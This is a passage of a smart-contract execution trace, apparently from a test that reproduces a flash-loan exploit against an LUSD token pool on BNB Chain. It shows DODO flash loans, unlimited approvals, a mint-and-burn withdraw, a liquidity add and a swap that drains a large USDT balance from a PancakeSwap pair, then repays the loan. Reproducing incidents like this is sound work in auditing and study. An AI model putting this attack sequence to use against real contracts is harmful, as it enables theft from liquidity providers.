    │   │   │   │   │   │   │   │   │   │   │   │   │   │           data: 0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000007130d2a12b9bcbfae4f2634d864a1ee1ce3ead9c0000000000000000000000003cd632c25a4db4c1a636cfb23b9285be1097a60d00000000000000000000000000000000000000000000000000000000000001f40000000000000000000000000000000000000000000000000000000000001388000000000000000000000000000000000000000000000000000000000000000300000000000000000000000000000000000000000000000000056237ca0acf9600000000000000000000000000000000000000000000021e1f9599d896bffdc10000000000000000000000000000000000000000000000000000000064a8202b
    │   │   │   │   │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0x838cb7bb5c06a66a21dd595cea33e8ec0de8d570a416ba58ef38933b5ca6618c: 0 → 0x00000000000000000000000000000000000000000000000000056237ca0acf96
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0x838cb7bb5c06a66a21dd595cea33e8ec0de8d570a416ba58ef38933b5ca6618b: 0 → 3
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0xcbca2c2e1a1577eb2e25b9dce980a2cead88d4a5422449a454760a1d38d5b82a: 0 → 1
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0x838cb7bb5c06a66a21dd595cea33e8ec0de8d570a416ba58ef38933b5ca66188: 0 → 0x0000000000000000000000003cd632c25a4db4c1a636cfb23b9285be1097a60d
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0x838cb7bb5c06a66a21dd595cea33e8ec0de8d570a416ba58ef38933b5ca6618a: 0 → 5000
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0x838cb7bb5c06a66a21dd595cea33e8ec0de8d570a416ba58ef38933b5ca6618d: 0 → 0x00000000000000000000000000000000000000000000021e1f9599d896bffdc1
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x00000000000000000000000000000000000000000000021e1f9599d896bffdc1
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0x838cb7bb5c06a66a21dd595cea33e8ec0de8d570a416ba58ef38933b5ca66189: 0 → 500
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0x838cb7bb5c06a66a21dd595cea33e8ec0de8d570a416ba58ef38933b5ca6618e: 0 → 0x0000000000000000000000000000000000000000000000000000000064a8202b
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0x838cb7bb5c06a66a21dd595cea33e8ec0de8d570a416ba58ef38933b5ca66187: 0 → 0x0000000000000000000000007130d2a12b9bcbfae4f2634d864a1ee1ce3ead9c
    │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   │   │   │   │   │   ├─ [24636] 0x3cD632C25A4Db4c1A636cFb23B9285Be1097A60d::approve(0x637De69F45F3b66D5389F305088A38109aA0cf7C, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ emit Approval(owner: LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x637De69F45F3b66D5389F305088A38109aA0cf7C, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0x39dc6f75f12c2f4b83a22229a75ec0ad71d012b80e2108321e523969f9576621: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   │   │   │   │   │   ├─ [586] 0x3cD632C25A4Db4c1A636cFb23B9285Be1097A60d::balanceOf(LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 10000411182292803780033 [1e22]
    │   │   │   │   │   │   │   │   │   │   │   │   ├─ [231691] 0x637De69F45F3b66D5389F305088A38109aA0cf7C::withdraw(10000411182292803780033 [1e22])
    │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ [8363] 0x3cD632C25A4Db4c1A636cFb23B9285Be1097A60d::transferFrom(LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x637De69F45F3b66D5389F305088A38109aA0cf7C, 10000411182292803780033 [1e22])
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ emit Transfer(from: LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x637De69F45F3b66D5389F305088A38109aA0cf7C, value: 10000411182292803780033 [1e22])
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0xd0ed020358fb3c3b8113d694d03ca925c0042ade34aa3c34088f70f7bfff63a2: 0x000000000000000000000000000000000000000000000000000000003b9aca00 → 0x00000000000000000000000000000000000000000000021e1f9599d8d25ac7c1
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x00000000000000000000000000000000000000000000021e1f9599d896bffdc1 → 0
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ [7902] 0x3cD632C25A4Db4c1A636cFb23B9285Be1097A60d::transfer(0x1c5D40D4FFB527B40ffD9a997CAC79D52A4A80eb, 200008223645856075600 [2e20])
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x637De69F45F3b66D5389F305088A38109aA0cf7C, to: 0x1c5D40D4FFB527B40ffD9a997CAC79D52A4A80eb, value: 200008223645856075600 [2e20])
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0xd0ed020358fb3c3b8113d694d03ca925c0042ade34aa3c34088f70f7bfff63a2: 0x00000000000000000000000000000000000000000000021e1f9599d8d25ac7c1 → 0x00000000000000000000000000000000000000000000021347e9a6214a383871
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0x6ad3e5ccf86103721d6f785522b78f8bec466477da170a9de3ef0d3fa97689a2: 0x00000000000000000000000000000000000000000000004a5e204158db8df643 → 0x00000000000000000000000000000000000000000000005535cc351063b08593
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ [5266] 0x3cD632C25A4Db4c1A636cFb23B9285Be1097A60d::burn(0x637De69F45F3b66D5389F305088A38109aA0cf7C, 100004111822928037800 [1e20])
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x637De69F45F3b66D5389F305088A38109aA0cf7C, to: 0x0000000000000000000000000000000000000000, value: 100004111822928037800 [1e20])
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 2: 0x00000000000000000000000000000000000000000000201859563851fc16e5cc → 0x000000000000000000000000000000000000000000002012ed803e7638059e24
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0xd0ed020358fb3c3b8113d694d03ca925c0042ade34aa3c34088f70f7bfff63a2: 0x00000000000000000000000000000000000000000000021347e9a6214a383871 → 0x00000000000000000000000000000000000000000000020ddc13ac458626f0c9
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ [2579] 0x7b97bCfC11054F1cF2e07dE9a9C449677E64DeA8::balanceOf(0x637De69F45F3b66D5389F305088A38109aA0cf7C) [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 1594549232465655263332 [1.594e21]
    │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ [4768] 0x7b97bCfC11054F1cF2e07dE9a9C449677E64DeA8::approve(Router: [0x10ED43C718714eb63d5aA57B78B54704E256024E], 1594549232465655263332 [1.594e21])
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ emit Approval(owner: 0x637De69F45F3b66D5389F305088A38109aA0cf7C, spender: Router: [0x10ED43C718714eb63d5aA57B78B54704E256024E], value: 1594549232465655263332 [1.594e21])
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ [24562] BEP20USDT::approve(Router: [0x10ED43C718714eb63d5aA57B78B54704E256024E], 100004111822928037800 [1e20])
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ emit Approval(owner: 0x637De69F45F3b66D5389F305088A38109aA0cf7C, spender: Router: [0x10ED43C718714eb63d5aA57B78B54704E256024E], value: 100004111822928037800 [1e20])
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0x7f86fb9acdd47e9e5e409419a35ceb41693011b58a511fedbb5594e609fe2d1a: 0 → 0x0000000000000000000000000000000000000000000000056bd5f9dbc41147a8
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ [141282] Router::addLiquidity(0x7b97bCfC11054F1cF2e07dE9a9C449677E64DeA8, BEP20USDT: [0x55d398326f99059fF775485246999027B3197955], 1594549232465655263332 [1.594e21], 100004111822928037800 [1e20], 0, 0, 0x637De69F45F3b66D5389F305088A38109aA0cf7C, 1688739883 [1.688e9])
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ [2676] 0xcA143Ce32Fe78f1f7019d7d551a6402fC5350c73::getPair(0x7b97bCfC11054F1cF2e07dE9a9C449677E64DeA8, BEP20USDT: [0x55d398326f99059fF775485246999027B3197955]) [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x7Da3fF95A3566287aFEc13b154794eee52A2e00d
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ [2893] 0x7Da3fF95A3566287aFEc13b154794eee52A2e00d::getReserves() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 492792467435163400000000 [4.927e23], 12796596534064232760289 [1.279e22], 1688739880 [1.688e9]
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ [27361] 0x7b97bCfC11054F1cF2e07dE9a9C449677E64DeA8::transferFrom(0x637De69F45F3b66D5389F305088A38109aA0cf7C, 0x7Da3fF95A3566287aFEc13b154794eee52A2e00d, 2596858424817186073 [2.596e18])
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ emit Approval(owner: 0x637De69F45F3b66D5389F305088A38109aA0cf7C, spender: Router: [0x10ED43C718714eb63d5aA57B78B54704E256024E], value: 1591952374040838077259 [1.591e21])
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x637De69F45F3b66D5389F305088A38109aA0cf7C, to: 0x7Da3fF95A3566287aFEc13b154794eee52A2e00d, value: 2596858424817186073 [2.596e18])
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0xd0ed020358fb3c3b8113d694d03ca925c0042ade34aa3c34088f70f7bfff63a2: 0x00000000000000000000000000000000000000000000005670d0dea4c3267064 → 0x0000000000000000000000000000000000000000000000564cc6f9aa3bf0fb4b
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0xab8fcf6d22c18bde7ab844435c98214360273915388f470cd12d0cbeb49e389b: 0x00000000000000000000000000000000000000000000005670d0dea4c3267064 → 0x0000000000000000000000000000000000000000000000564cc6f9aa3bf0fb4b
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0xef0070d472b3bd839178b17a240438ff2e3d4af4384b6abab13385ccf5eed3b4: 0x0000000000000000000000000000000000000000000002b5b4738c750d7383e1 → 0x0000000000000000000000000000000000000000000002b5d87d716f94a8f8fa
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ [15634] BEP20USDT::transferFrom(0x637De69F45F3b66D5389F305088A38109aA0cf7C, 0x7Da3fF95A3566287aFEc13b154794eee52A2e00d, 100004111822928037800 [1e20])
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x637De69F45F3b66D5389F305088A38109aA0cf7C, to: 0x7Da3fF95A3566287aFEc13b154794eee52A2e00d, value: 100004111822928037800 [1e20])
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ emit Approval(owner: 0x637De69F45F3b66D5389F305088A38109aA0cf7C, spender: Router: [0x10ED43C718714eb63d5aA57B78B54704E256024E], value: 0)
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0x7f86fb9acdd47e9e5e409419a35ceb41693011b58a511fedbb5594e609fe2d1a: 0x0000000000000000000000000000000000000000000000056bd5f9dbc41147a8 → 0
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0xed76e79bbf8456b5722f658147b4327d4861a0a4941273b05de72eb19fa98ef8: 0x00000000000000000000000000000000000000000000021e1f9599d896865000 → 0x000000000000000000000000000000000000000000000218b3bf9ffcd2750858
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0x0c5b9c968956330f8c1638cfee701144da3134783e03825fb2149711aba32e15: 0x00000000000000000000000000000000000000000000685a554bdde3aedbd200 → 0x00000000000000000000000000000000000000000000685fc121d7bf72ed19a8
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ [80681] 0x7Da3fF95A3566287aFEc13b154794eee52A2e00d::mint(0x637De69F45F3b66D5389F305088A38109aA0cf7C)
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ [531] BEP20USDT::balanceOf(0x7Da3fF95A3566287aFEc13b154794eee52A2e00d) [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 492892471546986328037800 [4.928e23]
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ [579] 0x7b97bCfC11054F1cF2e07dE9a9C449677E64DeA8::balanceOf(0x7Da3fF95A3566287aFEc13b154794eee52A2e00d) [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 12799193392489049946362 [1.279e22]
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ [2354] 0xcA143Ce32Fe78f1f7019d7d551a6402fC5350c73::feeTo() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x0ED943Ce24BaEBf257488771759F9BF482C39706
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x0ED943Ce24BaEBf257488771759F9BF482C39706, value: 23462634955175275 [2.346e16])
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x637De69F45F3b66D5389F305088A38109aA0cf7C, value: 16110436463978777246 [1.611e19])
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ emit Sync(reserve0: 492892471546986328037800 [4.928e23], reserve1: 12799193392489049946362 [1.279e22])
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ emit Mint(sender: Router: [0x10ED43C718714eb63d5aA57B78B54704E256024E], amount0: 100004111822928037800 [1e20], amount1: 2596858424817186073 [2.596e18])
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 9: 0x000000000000000000000000000000010ce5b78bc79db8ebc1639a00a199762d → 0x000000000000000000000000000000010ce5cb7d33843a22f92d19d3375ceb91
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0: 0x0000000000000000000000000000000000000000000010cf9e10f236d220fd64 → 0x0000000000000000000000000000000000000000000010d07df811f6ac14fd6d
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 8: 0x64a820280000000002b5b4738c750d7383e100000000685a554bdde3aedbd200 → 0x64a8202b0000000002b5d87d716f94a8f8fa00000000685fc121d7bf72ed19a8
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0xce5a46cd565c798db4579e1721082d7b4156f14a385995b283ae5d8d572faf65: 0x0000000000000000000000000000000000000000000000009525db7f9f1ecbc7 → 0x000000000000000000000000000000000000000000000000957936a4051e4132
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0xed76e79bbf8456b5722f658147b4327d4861a0a4941273b05de72eb19fa98ef8: 0x0000000000000000000000000000000000000000000000099d9d2cb93fca7023 → 0x00000000000000000000000000000000000000000000000a7d30f154b3befac1
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 11: 0x000000000000000000000000011ac5f548fe350c89cf986c86010adb1043d600 → 0x000000000000000000000000011ae379c092a732eb32ac7c6c4bee91e2a5ce10
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 10: 0x00000000000000000000000000000302649edee908f9ae2bbbb74ddaa1f96e26 → 0x00000000000000000000000000000302651266528354b1a95f6c23297c47d65a
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 16110436463978777246 [1.611e19]
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 2596858424817186073 [2.596e18], 100004111822928037800 [1e20], 16110436463978777246 [1.611e19]
    │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ [3266] 0x3cD632C25A4Db4c1A636cFb23B9285Be1097A60d::burn(0x637De69F45F3b66D5389F305088A38109aA0cf7C, 9700398846824019666633 [9.7e21])
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x637De69F45F3b66D5389F305088A38109aA0cf7C, to: 0x0000000000000000000000000000000000000000, value: 9700398846824019666633 [9.7e21])
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0xd0ed020358fb3c3b8113d694d03ca925c0042ade34aa3c34088f70f7bfff63a2: 0x00000000000000000000000000000000000000000000020ddc13ac458626f0c9 → 0x000000000000000000000000000000000000000000000000000000003b9aca00
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 2: 0x000000000000000000000000000000000000000000002012ed803e7638059e24 → 0x000000000000000000000000000000000000000000001e05116c9230ed79775b
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ [3271] BEP20USDT::transfer(LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 9700398846824019666633 [9.7e21])
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x637De69F45F3b66D5389F305088A38109aA0cf7C, to: LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 9700398846824019666633 [9.7e21])
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0xed76e79bbf8456b5722f658147b4327d4861a0a4941273b05de72eb19fa98ef8: 0x000000000000000000000000000000000000000000000218b3bf9ffcd2750858 → 0x00000000000000000000000000000000000000000000000ad7abf3b787e8e18f
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000240da5fc0f1f08cebe9e8 → 0x0000000000000000000000000000000000000000000242e83bd49e35d77810b1
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ emit Withdraw(param0: LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 10000411182292803780033 [1e22])
    │   │   │   │   │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0x7f86fb9acdd47e9e5e409419a35ceb41693011b58a511fedbb5594e609fe2d1a: 0 → 0x0000000000000000000000000000000000000000000000056bd5f9dbc41147a8
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 12: 0 → 1
    │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   │   │   │   │   │   ├─ [531] 0x7130d2A12B9BCbFAe4f2634d864A1Ee1Ce3Ead9c::balanceOf(LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 1245438231677192283 [1.245e18]
    │   │   │   │   │   │   │   │   │   │   │   │   ├─ [3271] 0x7130d2A12B9BCbFAe4f2634d864A1Ee1Ce3Ead9c::transfer(CakeLP: [0x3F803EC2b816Ea7F06EC76aA2B6f2532F9892d62], 1245438231677192283 [1.245e18])
    │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ emit Transfer(from: LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: CakeLP: [0x3F803EC2b816Ea7F06EC76aA2B6f2532F9892d62], value: 1245438231677192283 [1.245e18])
    │   │   │   │   │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0x62ca9b0aeef72297e6bc0479f5dbe36f0cb718b72e053d6f5b24b1c35992691a: 0x00000000000000000000000000000000000000000000000000dc12b5b3e5814b → 0x0000000000000000000000000000000000000000000000001224c22ed0b4c9a6
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000000001148af791ccf485b → 0
    │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   │   │   │   │   │   ├─ [18361] CakeLP::swap(799764317883596339564612 [7.997e23], 0, LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ [3271] BEP20USDT::transfer(LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 799764317883596339564612 [7.997e23])
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ emit Transfer(from: CakeLP: [0x3F803EC2b816Ea7F06EC76aA2B6f2532F9892d62], to: LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 799764317883596339564612 [7.997e23])
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0x62ca9b0aeef72297e6bc0479f5dbe36f0cb718b72e053d6f5b24b1c35992691a: 0x00000000000000000000000000000000000000000000b1cd1a4796e47b30d2d0 → 0x000000000000000000000000000000000000000000000871cac7a0b8bfa2828c
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000242e83bd49e35d77810b1 → 0x00000000000000000000000000000000000000000002ec438b549461930660f5
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ [531] BEP20USDT::balanceOf(CakeLP: [0x3F803EC2b816Ea7F06EC76aA2B6f2532F9892d62]) [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 39878025767517717430924 [3.987e22]
    │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ [531] 0x7130d2A12B9BCbFAe4f2634d864A1Ee1Ce3Ead9c::balanceOf(CakeLP: [0x3F803EC2b816Ea7F06EC76aA2B6f2532F9892d62]) [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 1307383298170079654 [1.307e18]
    │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ emit Sync(reserve0: 39878025767517717430924 [3.987e22], reserve1: 1307383298170079654 [1.307e18])
    │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ emit Swap(sender: LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0In: 0, amount1In: 1245438231677192283 [1.245e18], amount0Out: 799764317883596339564612 [7.997e23], amount1Out: 0, to: LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 8: 0x64a8202b00000000000000dc12b5b3e5814b00000000b1cd1a4796e47b30d2d0 → 0x64a8202b0000000000001224c22ed0b4c9a6000000000871cac7a0b8bfa2828c
    │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   │   │   │   │   │   ├─ [3271] BEP20USDT::transfer(DPPAdvanced: [0x81917eb96b397dFb1C6000d28A5bc08c0f05fC1d], 494306161149541726286277 [4.943e23])
    │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ emit Transfer(from: LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: DPPAdvanced: [0x81917eb96b397dFb1C6000d28A5bc08c0f05fC1d], value: 494306161149541726286277 [4.943e23])
    │   │   │   │   │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0x67306574ccf1a1cf42cc6d75cb83db2ef4d9176c23c126cb883f7d78e16b109e: 0 → 0x0000000000000000000000000000000000000000000068ac64043b393497f1c5
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000002ec438b549461930660f5 → 0x000000000000000000000000000000000000000000028397275059285e6e6f30
    │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   │   │   │   @ 12: 0 → 1
    │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0x39dc6f75f12c2f4b83a22229a75ec0ad71d012b80e2108321e523969f9576621: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0x62ca9b0aeef72297e6bc0479f5dbe36f0cb718b72e053d6f5b24b1c35992691a: 0x00000000000000000000000000000000000000000000000000dc12b5b3e5814b → 0x0000000000000000000000000000000000000000000000001224c22ed0b4c9a6
    │   │   │   │   │   │   │   │   │   │   │   │   │   @ 2: 2 → 1
    │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0x46ef40e8696b8cff1b33c02c95eb534a07a585e0da9f344852ee19d2ab660c25: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [2534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(DPPAdvanced: [0x81917eb96b397dFb1C6000d28A5bc08c0f05fC1d]) [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 452883220573313455992 [4.528e20]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [531] BEP20USDT::balanceOf(DPPAdvanced: [0x81917eb96b397dFb1C6000d28A5bc08c0f05fC1d]) [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 494306161149541726286277 [4.943e23]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(DPPAdvanced: [0x81917eb96b397dFb1C6000d28A5bc08c0f05fC1d]) [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 452883220573313455992 [4.528e20]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [531] BEP20USDT::balanceOf(DPPAdvanced: [0x81917eb96b397dFb1C6000d28A5bc08c0f05fC1d]) [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 494306161149541726286277 [4.943e23]
    │   │   │   │   │   │   │   │   │   │   │   ├─ emit DODOFlashLoan(: LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : 0, : 494306161149541726286277 [4.943e23])
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return]
    │   │   │   │   │   │   │   │   │   ├─ [3271] BEP20USDT::transfer(DPP: [0x6098A5638d8D7e9Ed2f952d35B2b67c34EC6B476], 80262899024076070546678 [8.026e22])
